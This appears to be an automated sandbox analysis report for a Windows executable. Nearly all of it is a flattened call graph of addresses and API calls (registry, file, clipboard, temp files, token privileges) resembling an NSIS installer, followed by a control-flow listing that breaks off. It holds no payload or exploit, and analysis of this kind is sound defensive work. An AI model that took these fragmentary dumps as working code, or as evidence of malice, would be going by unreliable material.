4820->4822 4821 73472280 MultiByteToWideChar 4821->4822 4822->4819 4822->4820 4822->4821 4823 734722ca wsprintfW 4822->4823 4824 734722ee GlobalFree 4822->4824 4825 73472325 GlobalFree 4822->4825 4826 734715eb 2 API calls 4822->4826 4871 73471638 4822->4871 4823->4822 4824->4822 4825->4735 4826->4822 4875 734712f8 GlobalAlloc 4828->4875 4830 7347166d 4831 73471f1e 2 API calls 4830->4831 4832 73471677 4831->4832 4833 734715eb 4832->4833 4834 734715f4 GlobalAlloc lstrcpynW 4833->4834 4835 73471633 GlobalFree 4833->4835 4834->4835 4835->4745 4837 73471f5c lstrcpyW 4836->4837 4838 73471f2b wsprintfW 4836->4838 4840 73471765 4837->4840 4838->4840 4840->4748 4842 734717a4 4841->4842 4843 7347201c 4841->4843 4842->4754 4842->4755 4843->4842 4844 73472033 GlobalFree 4843->4844 4844->4843 4846 734715eb 2 API calls 4845->4846 4847 734715e6 4846->4847 4847->4757 4848->4760 4849->4783 4850->4783 4858 734712f8 GlobalAlloc 4851->4858 4853 734712f0 lstrcpynW 4853->4783 4855 73471327 4854->4855 4855->4785 4856->4778 4857->4780 4858->4853 4860 73471555 4859->4860 4861 734712f8 GlobalAlloc 4859->4861 4862 734712e1 2 API calls 4860->4862 4861->4797 4863 7347156a 4862->4863 4863->4797 4865 734719ea VirtualAlloc 4864->4865 4866 73471a48 4864->4866 4865->4866 4866->4797 4868 73472ccd GetLastError 4867->4868 4869 73472cd8 4867->4869 4868->4869 4869->4742 4870->4822 4872 73471663 4871->4872 4873 7347163f 4871->4873 4872->4822 4873->4872 4874 73471648 lstrcpyW 4873->4874 4874->4872 4875->4830 4900 4025ff 4901 402608 4900->4901 4902 40262f 4900->4902 4903 4030c1 17 API calls 4901->4903 4904 40303e 17 API calls 4902->4904 4906 40260f 4903->4906 4905 402636 4904->4905 4912 40307c 4905->4912 4908 402615 4906->4908 4911 402648 4906->4911 4909 40303e 17 API calls 4908->4909 4910 40261c RegDeleteValueW RegCloseKey 4909->4910 4910->4911 4913 403089 4912->4913 4914 403090 4912->4914 4913->4911 4914->4913 4916 40141e 4914->4916 4917 4062b3 RegOpenKeyExW 4916->4917 4918 40145b 4917->4918 4919 401463 4918->4919 4920 401527 4918->4920 4921 401493 4919->4921 4922 40146f RegEnumValueW 4919->4922 4920->4913 4923 401503 RegCloseKey 4921->4923 4924 4014ce RegEnumKeyW 4921->4924 4925 4014d8 RegCloseKey 4921->4925 4927 40141e 6 API calls 4921->4927 4922->4921 4922->4923 4923->4920 4924->4921 4924->4925 4926 4068c1 5 API calls 4925->4926 4928 4014e9 4926->4928 4927->4921 4929 401514 4928->4929 4930 4014ed RegDeleteKeyW 4928->4930 4929->4920 4930->4920 5313 401000 5314 401039 BeginPaint GetClientRect 5313->5314 5315 40100a DefWindowProcW 5313->5315 5317 40110f 5314->5317 5318 40119a 5315->5318 5319 401117 5317->5319 5320 40107e CreateBrushIndirect FillRect DeleteObject 5317->5320 5321 401185 EndPaint 5319->5321 5322 40111d CreateFontIndirectW 5319->5322 5320->5317 5321->5318 5322->5321 5323 401130 6 API calls 5322->5323 5323->5321 3815 401d01 3816 401d5d 3815->3816 3817 401d0f 3815->3817 3819 401d67 3816->3819 3820 401d8c GlobalAlloc 3816->3820 3818 401d50 3817->3818 3824 401d1e 3817->3824 3822 405e95 17 API calls 3818->3822 3828 401709 3819->3828 3852 406af5 lstrcpynW 3819->3852 3832 405e95 3820->3832 3822->3816 3849 406af5 lstrcpynW 3824->3849 3825 401d79 GlobalFree 3825->3828 3827 401d2d 3850 406af5 lstrcpynW 3827->3850 3830 401d3c 3851 406af5 lstrcpynW 3830->3851 3845 405ea0 3832->3845 3833 4060d9 3835 4060ee 3833->3835 3860 406af5 lstrcpynW 3833->3860 3835->3828 3836 405fb9 GetSystemDirectoryW 3836->3845 3838 4060a4 lstrlenW 3838->3845 3839 405e95 10 API calls 3839->3838 3840 405fcc GetWindowsDirectoryW 3840->3845 3843 405ff9 SHGetSpecialFolderLocation 3844 406011 SHGetPathFromIDListW CoTaskMemFree 3843->3844 3843->3845 3844->3845 3845->3833 3845->3836 3845->3838 3845->3839 3845->3840 3845->3843 3846 405e95 10 API calls 3845->3846 3847 406d18 CharNextW CharNextW CharNextW CharNextW CharPrevW 3845->3847 3848 406045 lstrcatW 3845->3848 3853 406952 3845->3853 3858 4065fa wsprintfW 3845->3858 3859 406af5 lstrcpynW 3845->3859 3846->3845 3847->3845 3848->3845 3849->3827 3850->3830 3851->3828 3852->3825 3861 4062b3 3853->3861 3856 4069b8 3856->3845 3857 406987 RegQueryValueExW RegCloseKey 3857->3856 3858->3845 3859->3845 3860->3835 3862 4062c2 3861->3862 3863 4062c6 3862->3863 3864 4062cb RegOpenKeyExW 3862->3864 3863->3856 3863->3857 3864->3863 5324 401b03 5325 403002 17 API calls 5324->5325 5326 401b0a 5325->5326 5327 403002 17 API calls 5326->5327 5328 401b15 5327->5328 5329 40303e 17 API calls 5328->5329 5330 401b20 lstrlenW 5329->5330 5331 401b3c 5330->5331 5332 401b67 5330->5332 5331->5332 5336 406af5 lstrcpynW 5331->5336 5334 401b5b 5334->5332 5335 401b5f lstrlenW 5334->5335 5335->5332 5336->5334 5337 401c04 5338 403002 17 API calls 5337->5338 5339 401c0e 5338->5339 5340 403002 17 API calls 5339->5340 5341 401bb2 5340->5341 5342 73471000 5343 7347101b 5 API calls 5342->5343 5344 73471019 5343->5344 5345 401b88 5346 40303e 17 API calls 5345->5346 5347 401b8f 5346->5347 5348 40303e 17 API calls 5347->5348 5349 401b98 5348->5349 5350 401ba0 lstrcmpiW 5349->5350 5351 401ba8 lstrcmpW 5349->5351 5352 401bae 5350->5352 5351->5352 3911 404b0b 3912 404cb4 3911->3912 3913 404b28 GetDlgItem GetDlgItem GetDlgItem 3911->3913 3915 404d00 3912->3915 3916 404cbc GetDlgItem CreateThread CloseHandle 3912->3916 3957 4054de SendMessageW 3913->3957 3919 404d31 3915->3919 3920 404d08 3915->3920 3918 404ce8 3916->3918 3991 40583f OleInitialize 3916->3991 3917 404ba1 3927 404ba8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3917->3927 3962 405736 3918->3962 3921 404d39 3919->3921 3922 404d7f 3919->3922 3920->3918 3924 404d14 ShowWindow ShowWindow 3920->3924 3925 404d42 3921->3925 3926 404d55 ShowWindow 3921->3926 3922->3918 3932 404d92 SendMessageW 3922->3932 3976 4054de SendMessageW 3924->3976 3977 405933 3925->3977 3926->3925 3929 404d6c 3926->3929 3930 404bf8 SendMessageW SendMessageW 3927->3930 3931 404c0c 3927->3931 3980 405d15 3929->3980 3930->3931 3935 404c14 SendMessageW 3931->3935 3936 404c1e 3931->3936 3937 404cf6 3932->3937 3938 404db0 CreatePopupMenu 3932->3938 3935->3936 3958 4054f5 3936->3958 3941 405e95 17 API calls 3938->3941 3939 404d2f 3939->3918 3942 404dc2 AppendMenuW 3941->3942 3946 404de4 GetWindowRect 3942->3946 3947 404df8 TrackPopupMenu 3942->3947 3943 404c30 3944 404c39 ShowWindow 3943->3944 3945 404c6b GetDlgItem SendMessageW 3943->3945 3948 404c5a 3944->3948 3949 404c4f ShowWindow 3944->3949 3945->3937 3951 404c97 SendMessageW SendMessageW 3945->3951 3946->3947 3947->3937 3950 404e1a 3947->3950 3961 4054de SendMessageW 3948->3961 3949->3948 3952 404e2e SendMessageW 3950->3952 3951->3937 3952->3952 3954 404e4a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3952->3954 3955 404e76 SendMessageW 3954->3955 3955->3955 3956 404ea4 GlobalUnlock SetClipboardData CloseClipboard 3955->3956 3956->3937 3957->3917 3959 405e95 17 API calls 3958->3959 3960 405500 SetDlgItemTextW 3959->3960 3960->3943 3961->3945 3963 405804 3962->3963 3964 40574e GetWindowLongW 3962->3964 3963->3937 3964->3963 3965 405763 3964->3965 3965->3963 3966 405797 3965->3966 3967 40578b GetSysColor 3965->3967 3968 4057a5 SetBkMode 3966->3968 3969 40579b SetTextColor 3966->3969 3967->3966 3970 4057cd 3968->3970 3971 4057be GetSysColor 3968->3971 3969->3968 3972 4057d1 SetBkColor 3970->3972 3973 4057de 3970->3973 3971->3970 3972->3973 3973->3963 3974 4057f7 CreateBrushIndirect 3973->3974 3975 4057ee DeleteObject 3973->3975 3974->3963 3975->3974 3976->3939 3978 405940 SendMessageW 3977->3978 3979 40593a 3977->3979 3978->3939 3979->3978 3981 405d27 3980->3981 3986 405ddd 3980->3986 3982 405d46 lstrlenW 3981->3982 3983 405e95 17 API calls 3981->3983 3984 405d58 lstrlenW 3982->3984 3987 405d7b 3982->3987 3983->3982 3985 405d6d lstrcatW 3984->3985 3984->3986 3985->3987 3986->3925 3988 405d92 3987->3988 3989 405d85 SetWindowTextW 3987->3989 3988->3986 3990 405d97 SendMessageW SendMessageW SendMessageW 3988->3990 3989->3988 3990->3986 3998 4054c3 3991->3998 3993 405889 3994 4054c3 SendMessageW 3993->3994 3995 40589b OleUninitialize 3994->3995 3996 405862 3996->3993 4001 401399 3996->4001 3999 4054db 3998->3999 4000 4054cc SendMessageW 3998->4000 3999->3996 4000->3999 4002 401413 4001->4002 4004 4013a3 4001->4004 4002->3996 4004->4002 4005 4013df MulDiv SendMessageW 4004->4005 4006 40154a 4004->4006 4005->4004 4007 4015c3 4006->4007 4116 4015ce 4006->4116 4008 4016c1 4007->4008 4009 4017c2 4007->4009 4010 4015e6 4007->4010 4011 4018cb 4007->4011 4012 40160c 4007->4012 4013 4016ef 4007->4013 4014 4016af 4007->4014 4015 40182f 4007->4015 4016 401711 4007->4016 4017 401633 SetForegroundWindow 4007->4017 4018 4017d3 4007->4018 4019 401618 4007->4019 4020 4015f9 4007->4020 4021 40189b 4007->4021 4022 4018de 4007->4022 4023 40163f 4007->4023 4115 4015d5 4007->4115 4007->4116 4028 4016d1 ShowWindow 4008->4028 4029 4016d9 4008->4029 4032 40303e 17 API calls 4009->4032 4031 4015f0 PostQuitMessage 4010->4031 4010->4116 4036 40303e 17 API calls 4011->4036 4048 405d15 24 API calls 4012->4048 4030 40303e 17 API calls 4013->4030 4158 4065fa wsprintfW 4014->4158 4026 40303e 17 API calls 4015->4026 4033 40303e 17 API calls 4016->4033 4017->4116 4035 40303e 17 API calls 4018->4035 4024 403002 17 API calls 4019->4024 4054 401399 77 API calls 4020->4054 4034 40303e 17 API calls 4021->4034 4025 40303e 17 API calls 4022->4025 4049 403002 17 API calls 4023->4049 4023->4116 4037 40161e Sleep 4024->4037 4038 4018e5 4025->4038 4039 401835 GetFullPathNameW 4026->4039 4028->4029 4040 4016e6 ShowWindow 4029->4040 4029->4116 4042 4016f6 SetFileAttributesW 4030->4042 4031->4116 4043 4017c8 4032->4043 4044 401718 4033->4044 4045 4018a2 SearchPathW 4034->4045 4046 4017da 4035->4046 4047 4018d2 4036->4047 4037->4116 4059 401906 4038->4059 4060 40190e 4038->4060 4050 401857 4039->4050 4051 40184d 4039->4051 4040->4116 4041 405d15 24 API calls 4041->4116 4042->4116 4162 4065aa FindFirstFileW 4043->4162 4117 406ba0 CharNextW CharNextW 4044->4117 4045->4116 4055 40303e 17 API calls 4046->4055 4132 406a31 4047->4132 4048->4116 4049->4116 4050->4051 4067 4065aa 2 API calls 4050->4067 4061 401889 GetShortPathNameW 4051->4061 4051->4116 4054->4116 4057 4017e3 4055->4057 4058 40303e 17 API calls 4057->4058 4063 4017ec MoveFileW 4058->4063 4170 406af5 lstrcpynW 4059->4170 4171 406af5 lstrcpynW 4060->4171 4061->4116 4062 401780 4062->4012 4066 401790 4062->4066 4063->4012 4069 401804 4063->4069 4072 405d15 24 API calls 4066->4072 4073 40186a 4067->4073 4068 4065d1 CharNextW 4084 401720 4068->4084 4076 4065aa 2 API calls 4069->4076 4069->4116 4070 40190c 4079 406d18 5 API calls 4070->4079 4071 401919 4172 406531 lstrlenW CharPrevW 4071->4172 4075 401797 4072->4075 4073->4051 4169 406af5 lstrcpynW 4073->4169 4131 406af5 lstrcpynW 4075->4131 4083 401814 4076->4083 4108 40192b 4079->4108 4083->4116 4165 406218 MoveFileExW 4083->4165 4084->4062 4084->4068 4087 401769 GetFileAttributesW 4084->4087 4123 4064d7 4084->4123 4126 405e19 CreateDirectoryW 4084->4126 4159 405df9 CreateDirectoryW 4084->4159 4085 4017a2 SetCurrentDirectoryW 4085->4116 4087->4084 4089 4065aa 2 API calls 4089->4108 4090 401968 4175 406b78 GetFileAttributesW 4090->4175 4093 40193f CompareFileTime 4093->4108 4094 401a18 4095 405d15 24 API calls 4094->4095 4098 401a24 4095->4098 4096 4019fd 4097 405d15 24 API calls 4096->4097 4097->4116 4137 403148 4098->4137 4100 406af5 lstrcpynW 4100->4108 4102 401a52 SetFileTime 4104 401a60 CloseHandle 4102->4104 4103 405e95 17 API calls 4103->4108 4105 401a73 4104->4105 4104->4116 4106 401a78 4105->4106 4107 401a89 4105->4107 4109 405e95 17 API calls 4106->4109 4110 405e95 17 API calls 4107->4110 4108->4089 4108->4090 4108->4093 4108->4094 4108->4096 4108->4100 4108->4103 4108->4115 4136 4068f6 GetFileAttributesW CreateFileW 4108->4136 4178 406a83 4108->4178 4112 401a80 lstrcatW 4109->4112 4113 401a91 4110->4113 4112->4113 4114 406a83 MessageBoxIndirectW 4113->4114 4114->4116 4115->4041 4115->4116 4116->4004 4118 406bbe 4117->4118 4122 406bf5 4117->4122 4119 406bcd CharNextW 4118->4119 4120 406bd2 4118->4120 4119->4122 4121 4065d1 CharNextW 4120->4121 4120->4122 4121->4120 4122->4084 4182 4068c1 GetModuleHandleA 4123->4182 4127 405e64 GetLastError 4126->4127 4128 405e87 4126->4128 4127->4128 4129 405e71 SetFileSecurityW 4127->4129 4128->4084 4129->4128 4130 405e8b GetLastError 4129->4130 4130->4128 4131->4085 4133 406a3e GetTickCount GetTempFileNameW 4132->4133 4134 406a72 4133->4134 4135 406a76 4133->4135 4134->4133 4134->4135 4135->4116 4136->4108 4138 403190 4137->4138 4139 403183 4137->4139 4191 406923 ReadFile 4138->4191 4206 403131 SetFilePointer 4139->4206 4143 4032f6 4145 40333d 4143->4145 4149 4032fa 4143->4149 4144 4031b6 GetTickCount 4154 4031ca 4144->4154 4146 40311b ReadFile 4145->4146 4152 401a3a 4146->4152 4147 40311b ReadFile 4147->4149 4149->4147 4150 4069e6 WriteFile 4149->4150 4149->4152 4150->4149 4152->4102 4152->4104 4153 40323a GetTickCount 4153->4154 4154->4152 4154->4153 4155 40326b MulDiv wsprintfW 4154->4155 4193 40311b 4154->4193 4196 406e83 4154->4196 4204 4069e6 WriteFile 4154->4204 4156 405d15 24 API calls 4155->4156 4156->4154 4158->4116 4160 405e13 4159->4160 4161 405e0b GetLastError 4159->4161 4160->4084 4161->4160 4163 4065c0 FindClose 4162->4163 4164 4065cb 4162->4164 4163->4164 4164->4116 4166 406239 4165->4166 4167 40622c 4165->4167 4166->4012 4207 4062e1 4167->4207 4169->4051 4170->4070 4171->4071 4173 40191f lstrcatW 4172->4173 4174 40654e lstrcatW 4172->4174 4173->4070 4174->4173 4176 406b9a 4175->4176 4177 406b8a SetFileAttributesW 4175->4177 4176->4108 4177->4176 4180 406a98 4178->4180 4179 406ae6 4179->4108 4180->4179 4181 406aae MessageBoxIndirectW 4180->4181 4181->4179 4183 4068e3 GetProcAddress 4182->4183 4184 4068d9 4182->4184 4185 4064de 4183->4185 4188 406179 GetSystemDirectoryW 4184->4188 4185->4084 4187 4068df 4187->4183 4187->4185 4189 40619b wsprintfW LoadLibraryExW 4188->4189 4189->4187 4192 4031a2 4191->4192 4192->4143 4192->4144 4192->4152 4194 406923 ReadFile 4193->4194 4195 40312e 4194->4195 4195->4154 4197 406eae 4196->4197 4201 406ea6 4196->4201 4198 406fe9 4197->4198 4199 406fc5 GlobalFree 4197->4199 4200 406fcf GlobalAlloc 4197->4200 4197->4201 4198->4198 4198->4201 4202 407055 GlobalFree 4198->4202 4203 40705c GlobalAlloc 4198->4203 4199->4200 4200->4198 4200->4201 4201->4154 4202->4203 4203->4201 4205 406a07 4204->4205 4205->4154 4206->4138 4208 406311 4207->4208 4209 406337 GetShortPathNameW 4207->4209 4234 4068f6 GetFileAttributesW CreateFileW 4208->4234 4210 406417 4209->4210 4211 40634c 4209->4211 4210->4166 4211->4210 4214 406354 wsprintfA 4211->4214 4213 40631b CloseHandle GetShortPathNameW 4213->4210 4215 40632f 4213->4215 4216 405e95 17 API calls 4214->4216 4215->4209 4215->4210 4217 40637d 4216->4217 4235 4068f6 GetFileAttributesW CreateFileW 4217->4235 4219 40638a 4219->4210 4220 406395 GetFileSize GlobalAlloc 4219->4220 4221 406410 CloseHandle 4220->4221 4222 4063b4 4220->4222 4221->4210 4223 406923 ReadFile 4222->4223 4224 4063bc 4223->4224 4224->4221 4236 406b11 lstrlenA lstrlenA 4224->4236 4227 40641c 4229 406b11 3 API calls 4227->4229 4228 4063cf lstrcpyA 4231 4063e1 4228->4231 4229->4231 4230 4063f2 SetFilePointer 4232 4069e6 WriteFile 4230->4232 4231->4230 4233 406409 GlobalFree 4232->4233 4233->4221 4234->4213 4235->4219 4237 4063cb 4236->4237 4238 406b30 4236->4238 4237->4227 4237->4228 4238->4237 4239 406b5d lstrlenA 4238->4239 4239->4237 4239->4238 5353 73471b0a 5354 73471b38 5353->5354 5355 73472351 21 API calls 5354->5355 5356 73471b3f 5355->5356 5357 73471b46 5356->5357 5358 73471b52 5356->5358 5359 734715eb 2 API calls 5357->5359 5360 73471b73 5358->5360 5361 73471b5c 5358->5361 5369 73471b50 5359->5369 5362 73471b9f 5360->5362 5363 73471b79 5360->5363 5364 734715c5 3 API calls 5361->5364 5366 734715c5 3 API calls 5362->5366 5365 73471668 3 API calls 5363->5365 5367 73471b61 5364->5367 5368 73471b7e 5365->5368 5366->5369 5370 73471668 3 API calls 5367->5370 5372 734715eb 2 API calls 5368->5372 5371 73471b67 5370->5371 5373 734715eb 2 API calls 5371->5373 5374 73471b84 GlobalFree 5372->5374 5375 73471b6d GlobalFree 5373->5375 5374->5369 5374->5375 5377 401e8e 5378 403002 17 API calls 5377->5378 5379 401e94 IsWindow 5378->5379 5380 401bb2 5379->5380 5381 404f0e 5382 404f32 5381->5382 5383 404f1a 5381->5383 5385 404f66 5382->5385 5386 404f38 SHGetPathFromIDListW 5382->5386 5391 406a15 GetDlgItemTextW 5383->5391 5387 404f27 SendMessageW 5386->5387 5388 404f48 5386->5388 5387->5385 5389 401533 94 API calls 5388->5389 5389->5387 5391->5387 5392 40211b 5393 40303e 17 API calls 5392->5393 5394 402121 5393->5394 5395 405d15 24 API calls 5394->5395 5396 40212b 5395->5396 5397 4066b1 2 API calls 5396->5397 5398 402131 5397->5398 5399 40215b 5398->5399 5401 4064ef 5 API calls 5398->5401 5402 401709 5398->5402 5400 402110 CloseHandle 5399->5400 5399->5402 5400->5402 5403 40214b 5401->5403 5403->5399 5405 4065fa wsprintfW 5403->5405 5405->5399 4876 40291d 4877 403002 17 API calls 4876->4877 4884 40292e 4877->4884 4878 402aa2 SetFilePointer 4879 402aee 4881 402980 ReadFile 4881->4878 4881->4884 4882 406923 ReadFile 4882->4884 4883 402a3d 4883->4878 4883->4884 4890 40645f SetFilePointer 4883->4890 4884->4878 4884->4879 4884->4881 4884->4882 4884->4883 4885 402ae4 4884->4885 4886 4029c5 MultiByteToWideChar 4884->4886 4889 4029f6 SetFilePointer MultiByteToWideChar 4884->4889 4899 4065fa wsprintfW 4885->4899 4886->4884 4889->4884 4891 40647b 4890->4891 4892 406496 4890->4892 4893 406923 ReadFile 4891->4893 4892->4883 4894 406487 4893->4894 4894->4892 4895 4064c7 SetFilePointer 4894->4895 4896 40649f SetFilePointer 4894->4896 4895->4892 4896->4895 4897 4064aa 4896->4897 4898 4069e6 WriteFile 4897->4898 4898->4892 4899->4879 5406 40219d 5407 40303e 17 API calls 5406->5407 5408 4021a4 5407->5408 5409 4068c1 5 API calls 5408->5409 5410 4021b5 5409->5410 5411 402ea5 5410->5411 5412 4021ce GlobalAlloc 5410->5412 5412->5411 5413 4021e3 5412->5413 5414 4068c1 5 API calls 5413->5414 5415 4021ea 5414->5415 5416 4068c1 5 API calls 5415->5416 5417 4021f3 5416->5417 5418 40224e GlobalFree 5417->5418 5423 4065fa wsprintfW 5417->5423 5418->5411 5420 402237 5424 4065fa wsprintfW 5420->5424 5422 40224c 5422->5418 5423->5420 5424->5422 5425 73471aa7 5426 7347156c GlobalFree 5425->5426 5429 73471abf 5426->5429 5427 73471b01 GlobalFree 5428 73471add 5428->5427 5429->5427 5429->5428 5430 73471aed VirtualFree 5429->5430 5430->5427 5431 401aa1 5432 401aa2 5431->5432 5433 40303e 17 API calls 5432->5433 5434 401aa7 5433->5434 5435 4066f4 66 API calls 5434->5435 5436 401ab1 5435->5436 5437 403d23 5438 403d2e 5437->5438 5439 403d32 5438->5439 5440 403d35 GlobalAlloc 5438->5440 5440->5439 5441 402ba3 5442 40303e 17 API calls 5441->5442 5443 402bb2 5442->5443 5444 402bc9 5443->5444 5445 40303e 17 API calls 5443->5445 5446 406b78 2 API calls 5444->5446 5445->5444 5447 402bcf 5446->5447 5469 4068f6 GetFileAttributesW CreateFileW 5447->5469 5449 402bdc 5450 402cb7 5449->5450 5453 402bfd GlobalAlloc 5449->5453 5456 402c9f 5449->5456 5451 402cc0 DeleteFileW 5450->5451 5452 402ccf 5450->5452 5451->5452 5455 402c1d 5453->5455 5453->5456 5454 403148 35 API calls 5458 402cac CloseHandle 5454->5458 5470 403131 SetFilePointer 5455->5470 5456->5454 5458->5450 5459 402c23 5460 40311b ReadFile 5459->5460 5461 402c2d GlobalAlloc 5460->5461 5462 402c43 5461->5462 5463 402c84 5461->5463 5464 403148 35 API calls 5462->5464 5465 4069e6 WriteFile 5463->5465 5468 402c52 5464->5468 5466 402c93 GlobalFree 5465->5466 5466->5456 5467 402c7a GlobalFree 5467->5463 5468->5467 5469->5449 5470->5459 3876 402728 3887 4030c1 3876->3887 3881 402748 RegQueryValueExW 3882 402772 3881->3882 3883 40276b 3881->3883 3884 40271c RegCloseKey 3882->3884 3886 401709 3882->3886 3883->3882 3897 4065fa wsprintfW 3883->3897 3884->3886 3888 40303e 17 API calls 3887->3888 3889 4030d9 3888->3889 3890 4062b3 RegOpenKeyExW 3889->3890 3891 402732 3890->3891 3892 40303e 3891->3892 3893 405e95 17 API calls 3892->3893 3894 403067 3893->3894 3895 40273b 3894->3895 3898 406d18 3894->3898 3895->3881 3895->3886 3897->3882 3905 406d2d 3898->3905 3899 406daf 3900 406db7 CharPrevW 3899->3900 3903 406dd7 3899->3903 3900->3899 3901 406da0 CharNextW 3901->3899 3901->3905 3903->3895 3904 406d8c CharNextW 3904->3905 3905->3899 3905->3901 3905->3904 3906 406d9b CharNextW 3905->3906 3907 4065d1 3905->3907 3906->3901 3908 4065f7 3907->3908 3909 4065dd 3907->3909 3908->3905 3909->3908 3910 4065e6 CharNextW 3909->3910 3910->3908 3910->3909 5471 402b28 5472 402b2e 5471->5472 5473 402b36 FindClose 5472->5473 5474 402ea1 5472->5474 5473->5474 5475 40362a 5476 403650 5475->5476 5477 40363c SetTimer 5475->5477 5478 403659 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5476->5478 5479 4036a7 5476->5479 5477->5478 5478->5479 5480 4058ab 5481 4058c0 5480->5481 5482 4058d4 5480->5482 5483 4058c6 5481->5483 5484 405919 CallWindowProcW 5481->5484 5485 4058f3 5482->5485 5486 4058dc IsWindowVisible 5482->5486 5488 4054c3 SendMessageW 5483->5488 5487 4058d0 5484->5487 5485->5484 5491 405491 94 API calls 5485->5491 5486->5484 5489 4058e9 5486->5489 5488->5487 5490 4056b5 5 API calls 5489->5490 5490->5485 5491->5484 5492 4025ac 5493 40303e 17 API calls 5492->5493 5494 4025bd 5493->5494 5495 40303e 17 API calls 5494->5495 5496 4025c6 5495->5496 5497 40303e 17 API calls 5496->5497 5498 4025cf GetPrivateProfileStringW 5497->5498 5499 4025f4 5498->5499 5500 401ead 5501 403002 17 API calls 5500->5501 5502 401eb4 5501->5502 5503 403002 17 API calls 5502->5503 5504 401ebd GetDlgItem 5503->5504 4338 4027b0 4339 4030c1 17 API calls 4338->4339 4340 4027ba 4339->4340 4341 403002 17 API calls 4340->4341 4342 4027c3 4341->4342 4343 4027d5 4342->4343 4347 401709 4342->4347 4344 4027f0 RegEnumValueW 4343->4344 4345 4027e4 RegEnumKeyW 4343->4345 4346 40280e RegCloseKey 4344->4346 4345->4346 4346->4347 5505 405630 lstrcpynW lstrlenW 5506 401ab6 5507 40303e 17 API calls 5506->5507 5508 401abd 5507->5508 5509 406a83 MessageBoxIndirectW 5508->5509 5510 401709 5509->5510 5511 402837 5512 40303e 17 API calls 5511->5512 5515 401afd 5512->5515 5514 402855 5515->5511 5515->5514 5516 4068f6 GetFileAttributesW CreateFileW 5515->5516 5516->5515 5517 401fb8 GetDC 5518 403002 17 API calls 5517->5518 5519 401fc8 GetDeviceCaps MulDiv ReleaseDC 5518->5519 5520 403002 17 API calls 5519->5520 5521 401ff8 5520->5521 5522 405e95 17 API calls 5521->5522 5523 402032 CreateFontIndirectW 5522->5523 5524 73472ebf 5525 73472ed7 5524->5525 5526 73471309 2 API calls 5525->5526 5527 73472ef2 5526->5527 5528 401dba 5529 403002 17 API calls 5528->5529 5530 401dc1 5529->5530 5531 403002 17 API calls 5530->5531 5532 401dce 5531->5532 5533 401de1 5532->5533 5535 40303e 17 API calls 5532->5535 5534 401df6 5533->5534 5536 40303e 17 API calls 5533->5536 5537 401e50 5534->5537 5538 401e01 5534->5538 5535->5533 5536->5534 5540 40303e 17 API calls 5537->5540 5539 403002 17 API calls 5538->5539 5541 401e06 5539->5541 5542 401e55 5540->5542 5544 403002 17 API calls 5541->5544 5543 40303e 17 API calls 5542->5543 5545 401e5e FindWindowExW 5543->5545 5546 401e11 5544->5546 5549 401e7b 5545->5549 5547 401e41 SendMessageW 5546->5547 5548 401e1e SendMessageTimeoutW 5546->5548 5547->5549 5548->5549 5550 401bbb 5551 40303e 17 API calls 5550->5551 5552 401bc4 ExpandEnvironmentStringsW 5551->5552 5553 401bd7 5552->5553 5555 401be9 5552->5555 5554 401bdd lstrcmpW 5553->5554 5553->5555 5554->5555 5556 7347103a 5557 73471052 5556->5557 5558 734710c5 5557->5558 5559 73471081 5557->5559 5560 73471061 5557->5560 5562 7347156c GlobalFree 5559->5562 5561 7347156c GlobalFree 5560->5561 5563 73471072 5561->5563 5566 73471079 5562->5566 5564 7347156c GlobalFree 5563->5564 5564->5566 5565 73471091 GlobalSize 5567 7347109a 5565->5567 5566->5565 5566->5567 5568 734710af 5567->5568 5569 7347109e GlobalAlloc 5567->5569 5571 734710b8 GlobalFree 5568->5571 5570 734715c5 3 API calls 5569->5570 5570->5568 5571->5558

                                  Executed Functions

                                  Function 004036D7 Relevance: 89.7, APIs: 32, Strings: 19, Instructions: 416stringfilecomCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 4036d7-403720 SetErrorMode GetVersionExW 1 403722-403742 GetVersionExW 0->1 2 403759 0->2 3 403744-403748 1->3 4 403755-403757 1->4 5 403760-403765 2->5 6 40374b-403753 3->6 4->6 7 403772 5->7 8 403767-403770 5->8 6->5 9 403776-4037b8 7->9 8->9 10 4037ba-4037c2 call 4068c1 9->10 11 4037cb 9->11 10->11 17 4037c4 10->17 13 4037d0-4037e2 call 406179 lstrlenA 11->13 18 4037e4-403800 call 4068c1 * 3 13->18 17->11 25 403811-4038aa #17 OleInitialize SHGetFileInfoW call 406af5 GetCommandLineW call 406af5 call 4065d1 CharNextW 18->25 26 403802-403808 18->26 35 4038b0 25->35 36 403985-40399f GetTempPathW call 403c80 25->36 26->25 30 40380a 26->30 30->25 37 4038b2-4038b8 35->37 44 4039a1-4039bf GetWindowsDirectoryW lstrcatW call 403c80 36->44 45 4039f7-403a10 DeleteFileW call 4033c8 36->45 39 4038c5-4038d0 37->39 40 4038ba-4038c3 37->40 42 4038d2-4038d9 39->42 43 4038db-4038ea 39->43 40->39 40->40 42->43 48 403945-403959 call 4065d1 43->48 49 4038ec-4038f8 43->49 44->45 55 4039c1-4039f1 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403c80 44->55 57 403bc1 45->57 58 403a16-403a1c 45->58 65 403961-403967 48->65 66 40395b-40395e 48->66 53 403912-403918 49->53 54 4038fa-403901 49->54 61 403934-40393b 53->61 62 40391a-403921 53->62 59 403903-403906 54->59 60 403908 54->60 55->45 80 403bbf 55->80 69 403bc5-403bd2 call 4036ad OleUninitialize 57->69 67 403a81-403a88 call 405a19 58->67 68 403a1e-403a30 call 4065d1 58->68 59->53 59->60 60->53 61->48 64 40393d-403943 61->64 62->61 70 403923-40392a 62->70 64->48 75 403971-403980 call 406af5 64->75 65->36 76 403969-40396c 65->76 66->65 82 403a8d-403a8f 67->82 86 403a46-403a48 68->86 84 403bd4-403bdf call 406a83 69->84 85 403be7-403bee 69->85 72 403931 70->72 73 40392c-40392f 70->73 72->61 73->61 73->72 75->36 76->37 80->57 82->69 94 403be1 ExitProcess 84->94 90 403bf0-403c06 GetCurrentProcess OpenProcessToken 85->90 91 403c6c-403c7b 85->91 87 403a32-403a38 86->87 88 403a4a-403a51 86->88 98 403a43 87->98 99 403a3a-403a41 87->99 92 403a53-403a63 call 406613 88->92 93 403a94-403aac call 4064d7 lstrcatW 88->93 96 403c08-403c36 LookupPrivilegeValueW AdjustTokenPrivileges 90->96 97 403c3c-403c4a call 4068c1 90->97 91->94 106 403a69-403a7f call 406af5 * 2 92->106 107 403bbb-403bbd 92->107 110 403abd-403ade lstrcatW 